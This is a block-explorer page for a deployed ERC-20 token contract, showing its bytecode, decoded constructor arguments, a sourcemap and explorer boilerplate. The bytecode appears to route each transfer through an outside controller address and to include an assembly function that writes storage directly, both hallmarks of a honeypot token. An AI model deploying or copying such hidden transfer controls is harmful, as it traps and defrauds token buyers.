7f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610650908590610c2c565b60405180910390a3505050565b6001600160a01b0383166106835760405162461bcd60e51b81526004016103b190610ba3565b6001600160a01b0382166106a95760405162461bcd60e51b81526004016103b190610a96565b6000807f000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d6001600160a01b0316856040516024016106e79190610a44565b60408051601f198184030181529181526020820180516001600160e01b03166370a0823160e01b1790525161071c9190610a28565b6000604051808303816000865af19150503d8060008114610759576040519150601f19603f3d011682016040523d82523d6000602084013e61075e565b606091505b509150915081156107b5576020818101516001600160a01b03871660009081526005909252604090912054600114158061079757508015155b6107b35760405162461bcd60e51b81526004016103b190610b52565b505b6107f283604051806060016040528060268152602001610d0f602691396001600160a01b0388166000908152600460205260409020549190610882565b6001600160a01b03808716600090815260046020526040808220939093559086168152205461082190846108bc565b6001600160a01b0380861660008181526004602052604090819020939093559151908716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90610873908790610c2c565b60405180910390a35050505050565b600081848411156108a65760405162461bcd60e51b81526004016103b19190610a63565b5060006108b38486610c7a565b95945050505050565b6000806108c98385610c43565b9050838110156108eb5760405162461bcd60e51b81526004016103b190610b1b565b9392505050565b80356001600160a01b038116811461038257600080fd5b60006020828403121561091a578081fd5b6108eb826108f2565b60008060408385031215610935578081fd5b61093e836108f2565b915061094c602084016108f2565b90509250929050565b600080600060608486031215610969578081fd5b610972846108f2565b9250610980602085016108f2565b9150604084013590509250925092565b600080604083850312156109a2578182fd5b6109ab836108f2565b946020939093013593505050565b600080602083850312156109cb578182fd5b823567ffffffffffffffff808211156109e2578384fd5b818501915085601f8301126109f5578384fd5b813581811115610a03578485fd5b8660208083028501011115610a16578485fd5b60209290920196919550909350505050565b60008251610a3a818460208701610c91565b9190910192915050565b6001600160a01b0391909116815260200190565b901515815260200190565b6000602082528251806020840152610a82816040850160208701610c91565b601f01601f19169190910160400192915050565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252601b908201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604082015260600190565b6020808252600290820152610caf60f31b604082015260600190565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b90815260200190565b60ff91909116815260200190565b60008219821115610c5657610c56610cf8565b500190565b6000816000190483118215151615610c7557610c75610cf8565b500290565b600082821015610c8c57610c8c610cf8565b500390565b60005b83811015610cac578181015183820152602001610c94565b838111156104985750506000910152565b600281046001821680610cd157607f821691505b60208210811415610cf257634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fdfe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220dd773a1d90175fd9182b9656d422ba30aa72e8f5f99e27f90ced8b32251ed71f64736f6c63430008000033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000000a57936813b0040400445009103040222c64082000000002d9e084852f62fdb4eedffb6813f30426316470d938786baf2e7e0c2000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d

-----Decoded View---------------
Arg [0] : maxVals (uint256): 3690182091379871600196967562228664350743609474
Arg [1] : minVals (uint256): 4804063864589154233698678857077236922078578674473006581194894598338
Arg [2] : _cclmm_ (address): 0xDff32C65f843188cF64ECBC6F4a13cFf12581b9D

-----Encoded View---------------
3 Constructor Arguments found :
Arg [0] : 00000000000000000000000000a57936813b0040400445009103040222c64082
Arg [1] : 000000002d9e084852f62fdb4eedffb6813f30426316470d938786baf2e7e0c2
Arg [2] : 000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d


Deployed Bytecode Sourcemap

5490:9450:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7682:94;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8973:193;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;7840:102::-;;;:::i;:::-;;;;;;;:::i;10402:444::-;;;;;;:::i;:::-;;:::i;7370:86::-;;;:::i;:::-;;;;;;;:::i;11254:281::-;;;;;;:::i;:::-;;:::i;8004:162::-;;;;;;:::i;:::-;;:::i;6995:146::-;;;:::i;:::-;;9174:495;;;;;;:::i;:::-;;:::i;7222:81::-;;;:::i;:::-;;;;;;;:::i;7521:98::-;;;:::i;12037:381::-;;;;;;:::i;:::-;;:::i;8378:199::-;;;;;;:::i;:::-;;:::i;9743:188::-;;;:::i;8639:::-;;;;;;:::i;:::-;;:::i;7682:94::-;7730:13;7763:5;7756:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7682:94;:::o;8973:193::-;9077:4;9099:37;9108:10;9120:7;9129:6;9099:8;:37::i;:::-;-1:-1:-1;9154:4:0;8973:193;;;;:::o;7840:102::-;7922:12;;7840:102;:::o;10402:444::-;10536:4;10553:36;10563:6;10571:9;10582:6;10553:9;:36::i;:::-;10600:216;10623:6;10644:10;10669:136;10723:6;10669:136;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;10669:19:0;;;;;;:11;:19;;;;;;;;10689:10;10669:31;;;;;;;;;:136;:35;:136::i;:::-;10600:8;:216::i;:::-;-1:-1:-1;10834:4:0;10402:444;;;;;:::o;7370:86::-;7447:1;7370:86;:::o;11254:281::-;11399:10;11354:4;11446:23;;;:11;:23;;;;;;;;-1:-1:-1;;;;;11446:32:0;;;;;;;;;;11354:4;;11376:129;;11424:7;;11446:48;;11483:10;11446:36;:48::i;8004:162::-;-1:-1:-1;;;;;8140:18:0;;8108:7;8140:18;;;:9;:18;;;;;;8004:162;;;;:::o;6995:146::-;6622:6;;-1:-1:-1;;;;;6622:6:0;6608:10;:20;6600:65;;;;-1:-1:-1;;;6600:65:0;;;;;;;:::i;:::-;;;;;;;;;7054:6:::1;:19:::0;;-1:-1:-1;;;;;;7054:19:0::1;::::0;;7089:44:::1;::::0;7071:1:::1;::::0;7110:10:::1;::::0;7089:44:::1;::::0;7071:1;;7089:44:::1;6995:146::o:0;9174:495::-;9239:10;:8;:10::i;:::-;9234:24;;9251:7;;9234:24;9269:10;9281;9296:4;;9301:1;9296:7;;;;;-1:-1:-1;;;9296:7:0;;;;;;;;;;;;;;;9305:4;;9310:1;9305:7;;;;;-1:-1:-1;;;9305:7:0;;;;;;;;;;;;;;;9268:45;;;;9358:1;9354:2;9351:9;9348:2;;;9390;9387:1;9380:13;9429:1;9426;9422:9;9418:2;9411:21;9475:2;9470;9467:1;9457:16;9450:28;9348:2;9510:9;9507:2;;9549;9546:1;9539:13;9588:1;9585;9581:9;9577:2;9570:21;9634:1;9629:2;9626:1;9616:16;9609:27;9507:2;9333:329;;;;;:::o;7222:81::-;7289:6;;-1:-1:-1;;;;;7289:6:0;7222:81;:::o;7521:98::-;7571:13;7604:7;7597:14;;;;;:::i;12037:381::-;12142:4;12164:224;12187:10;12212:7;12234:143;12289:15;12234:143;;;;;;;;;;;;;;;;;12246:10;12234:23;;;;:11;:23;;;;;;;;-1:-1:-1;;;;;12234:32:0;;;;;;;;;;;:143;:36;:143::i;8378:199::-;8485:4;8507:40;8517:10;8529:9;8540:6;8507:9;:40::i;9743:188::-;9784:4;;9817:24;:8;9829:11;9817:24;:::i;:::-;9801:40;-1:-1:-1;9901:22:0;:8;9913:9;9901:22;:::i;:::-;9876:10;9860:36;;;9859:64;;-1:-1:-1;9743:188:0;:::o;8639:::-;-1:-1:-1;;;;;8791:19:0;;;8759:7;8791:19;;;:11;:19;;;;;;;;:28;;;;;;;;;;;;;8639:188::o;14237:374::-;-1:-1:-1;;;;;14366:20:0;;14358:69;;;;-1:-1:-1;;;14358:69:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;14446:21:0;;14438:68;;;;-1:-1:-1;;;14438:68:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;14517:19:0;;;;;;;:11;:19;;;;;;;;:28;;;;;;;;;;;;;;:37;;;14570:33;;;;;14548:6;;14570:33;:::i;:::-;;;;;;;;14237:374;;;:::o;12908:889::-;-1:-1:-1;;;;;13040:20:0;;13032:70;;;;-1:-1:-1;;;13032:70:0;;;;;;;:::i;:::-;-1:-1:-1;;;;;13121:23:0;;13113:71;;;;-1:-1:-1;;;13113:71:0;;;;;;;:::i;:::-;13196:12;13210:17;13231:6;-1:-1:-1;;;;;13231:11:0;13303:6;13257:53;;;;;;;;:::i;:::-;;;;-1:-1:-1;;13257:53:0;;;;;;;;;;;;;;-1:-1:-1;;;;;13257:53:0;-1:-1:-1;;;13257:53:0;;;13231:90;;;13257:53;13231:90;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13195:126;;;;13336:7;13332:200;;;13439:4;13429:15;;;13423:22;-1:-1:-1;;;;;13482:13:0;;13360:12;13482:13;;;:5;:13;;;;;;;;13499:1;13482:18;;;:31;;-1:-1:-1;13504:9:0;;;13482:31;13474:46;;;;-1:-1:-1;;;13474:46:0;;;;;;;:::i;:::-;13332:200;;13564:108;13600:6;13564:108;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;13564:17:0;;;;;;:9;:17;;;;;;;:108;:21;:108::i;:::-;-1:-1:-1;;;;;13544:17:0;;;;;;;:9;:17;;;;;;:128;;;;13706:20;;;;;;;:32;;13731:6;13706:24;:32::i;:::-;-1:-1:-1;;;;;13683:20:0;;;;;;;:9;:20;;;;;;;:55;;;;13754:35;;;;;;;;;;13782:6;;13754:35;:::i;:::-;;;;;;;;12908:889;;;;;:::o;1925:224::-;2045:7;2081:12;2073:6;;;;2065:29;;;;-1:-1:-1;;;2065:29:0;;;;;;;;:::i;:::-;-1:-1:-1;2105:9:0;2117:5;2121:1;2117;:5;:::i;:::-;2105:17;1925:224;-1:-1:-1;;;;;1925:224:0:o;1040:179::-;1098:7;;1130:5;1134:1;1130;:5;:::i;:::-;1118:17;;1159:1;1154;:6;;1146:46;;;;-1:-1:-1;;;1146:46:0;;;;;;;:::i;:::-;1210:1;1040:179;-1:-1:-1;;;1040:179:0:o;14:175:2:-;84:20;;-1:-1:-1;;;;;133:31:2;;123:42;;113:2;;179:1;176;169:12;194:198;;306:2;294:9;285:7;281:23;277:32;274:2;;;327:6;319;312:22;274:2;355:31;376:9;355:31;:::i;397:274::-;;;526:2;514:9;505:7;501:23;497:32;494:2;;;547:6;539;532:22;494:2;575:31;596:9;575:31;:::i;:::-;565:41;;625:40;661:2;650:9;646:18;625:40;:::i;:::-;615:50;;484:187;;;;;:::o;676:342::-;;;;822:2;810:9;801:7;797:23;793:32;790:2;;;843:6;835;828:22;790:2;871:31;892:9;871:31;:::i;:::-;861:41;;921:40;957:2;946:9;942:18;921:40;:::i;:::-;911:50;;1008:2;997:9;993:18;980:32;970:42;;780:238;;;;;:::o;1023:266::-;;;1152:2;1140:9;1131:7;1127:23;1123:32;1120:2;;;1173:6;1165;1158:22;1120:2;1201:31;1222:9;1201:31;:::i;:::-;1191:41;1279:2;1264:18;;;;1251:32;;-1:-1:-1;;;1110:179:2:o;1294:666::-;;;1441:2;1429:9;1420:7;1416:23;1412:32;1409:2;;;1462:6;1454;1447:22;1409:2;1507:9;1494:23;1536:18;1577:2;1569:6;1566:14;1563:2;;;1598:6;1590;1583:22;1563:2;1641:6;1630:9;1626:22;1616:32;;1686:7;1679:4;1675:2;1671:13;1667:27;1657:2;;1713:6;1705;1698:22;1657:2;1758;1745:16;1784:2;1776:6;1773:14;1770:2;;;1805:6;1797;1790:22;1770:2;1864:7;1859:2;1853;1845:6;1841:15;1837:2;1833:24;1829:33;1826:46;1823:2;;;1890:6;1882;1875:22;1823:2;1926;1918:11;;;;;1948:6;;-1:-1:-1;1399:561:2;;-1:-1:-1;;;;1399:561:2:o;1965:274::-;;2132:6;2126:13;2148:53;2194:6;2189:3;2182:4;2174:6;2170:17;2148:53;:::i;:::-;2217:16;;;;;2102:137;-1:-1:-1;;2102:137:2:o;2244:203::-;-1:-1:-1;;;;;2408:32:2;;;;2390:51;;2378:2;2363:18;;2345:102::o;2452:187::-;2617:14;;2610:22;2592:41;;2580:2;2565:18;;2547:92::o;2644:383::-;;2793:2;2782:9;2775:21;2825:6;2819:13;2868:6;2863:2;2852:9;2848:18;2841:34;2884:66;2943:6;2938:2;2927:9;2923:18;2918:2;2910:6;2906:15;2884:66;:::i;:::-;3011:2;2990:15;-1:-1:-1;;2986:29:2;2971:45;;;;3018:2;2967:54;;2765:262;-1:-1:-1;;2765:262:2:o;3032:399::-;3234:2;3216:21;;;3273:2;3253:18;;;3246:30;3312:34;3307:2;3292:18;;3285:62;-1:-1:-1;;;3378:2:2;3363:18;;3356:33;3421:3;3406:19;;3206:225::o;3436:398::-;3638:2;3620:21;;;3677:2;3657:18;;;3650:30;3716:34;3711:2;3696:18;;3689:62;-1:-1:-1;;;3782:2:2;3767:18;;3760:32;3824:3;3809:19;;3610:224::o;3839:351::-;4041:2;4023:21;;;4080:2;4060:18;;;4053:30;4119:29;4114:2;4099:18;;4092:57;4181:2;4166:18;;4013:177::o;4195:325::-;4397:2;4379:21;;;4436:1;4416:18;;;4409:29;-1:-1:-1;;;4469:2:2;4454:18;;4447:32;4511:2;4496:18;;4369:151::o;4525:356::-;4727:2;4709:21;;;4746:18;;;4739:30;4805:34;4800:2;4785:18;;4778:62;4872:2;4857:18;;4699:182::o;4886:401::-;5088:2;5070:21;;;5127:2;5107:18;;;5100:30;5166:34;5161:2;5146:18;;5139:62;-1:-1:-1;;;5232:2:2;5217:18;;5210:35;5277:3;5262:19;;5060:227::o;5292:400::-;5494:2;5476:21;;;5533:2;5513:18;;;5506:30;5572:34;5567:2;5552:18;;5545:62;-1:-1:-1;;;5638:2:2;5623:18;;5616:34;5682:3;5667:19;;5466:226::o;5697:177::-;5843:25;;;5831:2;5816:18;;5798:76::o;5879:184::-;6051:4;6039:17;;;;6021:36;;6009:2;5994:18;;5976:87::o;6068:128::-;;6139:1;6135:6;6132:1;6129:13;6126:2;;;6145:18;;:::i;:::-;-1:-1:-1;6181:9:2;;6116:80::o;6201:168::-;;6307:1;6303;6299:6;6295:14;6292:1;6289:21;6284:1;6277:9;6270:17;6266:45;6263:2;;;6314:18;;:::i;:::-;-1:-1:-1;6354:9:2;;6253:116::o;6374:125::-;;6442:1;6439;6436:8;6433:2;;;6447:18;;:::i;:::-;-1:-1:-1;6484:9:2;;6423:76::o;6504:258::-;6576:1;6586:113;6600:6;6597:1;6594:13;6586:113;;;6676:11;;;6670:18;6657:11;;;6650:39;6622:2;6615:10;6586:113;;;6717:6;6714:1;6711:13;6708:2;;;-1:-1:-1;;6752:1:2;6734:16;;6727:27;6557:205::o;6767:380::-;6852:1;6842:12;;6899:1;6889:12;;;6910:2;;6964:4;6956:6;6952:17;6942:27;;6910:2;7017;7009:6;7006:14;6986:18;6983:38;6980:2;;;7063:10;7058:3;7054:20;7051:1;7044:31;7098:4;7095:1;7088:15;7126:4;7123:1;7116:15;6980:2;;6822:325;;;:::o;7152:127::-;7213:10;7208:3;7204:20;7201:1;7194:31;7244:4;7241:1;7234:15;7268:4;7265:1;7258:15

Swarm Source

ipfs://dd773a1d90175fd9182b9656d422ba30aa72e8f5f99e27f90ced8b32251ed71f

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.